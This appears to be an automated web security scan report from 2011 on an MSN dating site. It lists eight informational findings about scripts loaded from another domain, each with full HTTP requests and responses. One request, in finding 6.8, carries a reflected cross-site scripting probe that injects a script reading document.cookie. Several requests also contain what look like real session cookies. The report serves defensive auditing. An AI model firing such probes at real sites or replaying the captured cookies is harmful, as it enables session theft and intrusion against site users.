<a href="/profile/showProfile.aspx?uid=mMrwANZwdc8oxCiF0DFQsw==&amp;handle=Kashif24820B&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=AUwYB5i/5st17GSOscLrsw==&amp;handle=prodtestnctsxom&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=VGv9lEIUkrGu3KGWFcVF/A==&amp;handle=prodtestyXhqUN&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=7HhIgp7QWwKQKr0eBJxuvQ==&amp;handle=ColtPython357&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=nJap7cwK85f3pRgiB+A72Q==&amp;handle=prodtestmBYr1U&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=Dfi0uRQAuuQIunqwtUKFig==&amp;handle=johnny7763&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=vmtQC49rG+ArGC+fQcns5Q==&amp;handle=coach3435&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=OFb9K9tK4mvFZQpMDG4SBw==&amp;handle=bdefine&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=SfjmHm3MFaK6mkCSSaDDhg==&amp;handle=cordaytx&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=901fBhtwTnTGCi8SdsBEWw==&amp;handle=eccentric_aa&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://images.match.com/match/search/s09/100x80-androg_bw.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/profile/showProfile.aspx?uid=aV+vV8LSkNvsu/0kDEGbRg==&amp;handle=PatrickCronin11&amp;tp=S&amp;pn=1&amp;rn=4&amp;do=2&amp;lid=18"><img class="profilePic" src="http://sthumbnails.match.com/sthumbnails/96/27/54239627I.jpeg" style="border-width:0px;" /></a>
...[SNIP]...
</textarea>
<a href="http://www.match.com" class="notNow">not right now</a>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

6. Cross-domain script include  previous
There are 8 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://dating.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=2; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; Sample=69

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 02:14:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:14:58 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.2. http://dating.msn.com/cp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /cp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:06 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=3117c0bd-b2a2-42c7-9fd5-ea22006fd423; expires=Sun, 12-Feb-2012 02:07:04 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=5179d6bc-e1fe-452f-a4c7-64b19c31c524&THEME=83; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.3. http://dating.msn.com/en-us/partner/msn/38028.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /en-us/partner/msn/38028.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:02 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=441f72ce-b34f-4121-9e1f-dbdb8720d56e; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=cbd24bfb-f094-4e4b-9c9f-b6435944415a&THEME=81; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.4. http://dating.msn.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:06:57 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=0cfcee5e-ede5-40aa-b67a-f606291a9668; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=44fc8970-3e92-4346-8555-1679a538d5ee&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.5. http://dating.msn.com/msn/article/articleindex.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /msn/article/articleindex.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/article/articleindex.aspx HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://dating.msn.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=2; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; Sample=69

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:15:14 GMT; path=/
Date: Sat, 12 Feb 2011 02:15:14 GMT
Content-Length: 34474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" src="http://cp.match.com/cppp/msn/js/article.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.6. http://dating.msn.com/profile/showprofiledl.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /profile/showprofiledl.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /profile/showprofiledl.aspx?tp=ms&handle=mjhg8tr&uid=mLdcDpyVPCAVYGUaNrEo/Q==&trackingid=525877&bannerid=692804 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:00 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=085de06d-fc4c-4fde-8af4-49643f5f15a8; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: SECU=TID=525877&ESID=f880f4a8-c8e2-48be-ac08-57819cb209a5&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.7. http://dating.msn.com/search/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:01 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=5929b972-6ddc-489d-90e7-c8992efbc98a; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=1c5b6933-5943-4a1a-8ba5-e1be74751214&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

6.8. http://dating.msn.com/search/searchSubmit.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/searchSubmit.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/searchSubmit.aspx?8f518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1add0d48d=1&ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2 HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=1; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: msnc=2; expires=Thu, 17-Feb-2011 02:09:46 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:09:46 GMT; path=/
Date: Sat, 12 Feb 2011 02:09:47 GMT
Content-Length: 174766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/ui.fbconnect.js"></script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/ggs1.js"></script>
<script language="javascript" src="http://cp.match.com/cppp/floatingreg/scripts/currentURL.js"></script>
...[SNIP]...

Report generated by XSS.CX at Mon Feb 14 11:08:11 CST 2011.